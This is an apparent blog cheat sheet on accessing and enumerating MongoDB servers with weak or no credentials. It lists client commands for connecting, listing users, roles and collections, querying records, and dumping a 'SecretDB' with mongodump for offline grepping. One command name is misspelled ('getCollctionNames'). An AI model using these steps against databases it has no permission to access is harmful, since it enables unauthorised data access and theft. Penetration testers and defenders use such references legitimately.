Introduction
There is a plethora of literature on hacking SQL databases. This means going from database access to OS level execution or shells. However there seems to be a shortage of information on hacking no-sql databases such as Mongo DB. This article will hopefully help others get a jump start when they run into a Mongo database with weak or no credentials (yes it has happened). It does not list all possibilities and is only meant to be a cheat sheet. Feel free to list your favorite commands as well as tips and tricks in the comment section below.Install mongo client on Kali:
apt-get install mongodb-clients
Connect to DB:
mongo --port <port> -u <username> -p <password> <IP>
Note: Port 27017 is default value
ex: mongo -u foo -p bar 10.10.10.10
Show server info:
db.adminCommand( { "hostInfo" : 1 } )
ex: db.adminCommand( { "hostInfo" : 1 } )
{
"system" : {
"currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
"hostname" : "AwesomePC",
"cpuAddrSize" : 64,
"memSizeMB" : 1002,
"numCores" : 2,
"cpuArch" : "x86_64",
"numaEnabled" : false
},
"os" : {
"type" : "Linux",
"name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
"version" : "Kernel 3.2.0-4-amd64"
},
"extra" : {
"versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
"libcVersion" : "2.13",
"kernelVersion" : "3.2.0-4-amd64",
"cpuFrequencyMHz" : "2266.747",
},
"ok" : 1
}
>
Show users:
show users
-or-
db.runCommand( { usersInfo: 1 } )
ex: show users
Show roles:
show roles
ex: show roles
Show databases:
show dbs
ex: show dbs
SecretDB (size of DB)
AwesomeDB (size of DB)
EmptyDB (empty)
Use database:
use <db_name>
ex: use SecretDB
Show tables (called collections):
show tables
-or-
show collections
-or-
db.getCollctionNames()
ex: show tables
fluffy
users
List data in the table/collection:
db.<table_name>.find()
ex: db.users.find()
Note: by default, it will only display one page
Can also set limit with:
db.<table_name>.find().limit(#)
ex: db.users.find().limit(5)
Search for exact match in the table/collection:
db.<collection_name>.find( { <column_name> : "<value>" } )
ex: db.users.find( { name : "Tony" } )
Wildcard search data in the table/collection:
db.<collection_name>.find( { <column_name> : /<value>/i } )
Note: the i at the end of the /, makes the search case insensitive
ex: db.users.find( { name : /tony/i } )
Dump the DB for off-line grepping:
mongodump -u <user> -p <pass> -h <IP> --db <db_name>
ex: mongodump -u foo -p bar -h 10.10.10.10 --db SecretDB
Note: Results are dumped to: dump/<db_name>/<collection_name>.bson
Logout:
logout
CAVEATS:
The cat command reads your own files, not the remote system's files
ex: cat ("/etc/shadow") is your own shadow file :( Bummer, I know!
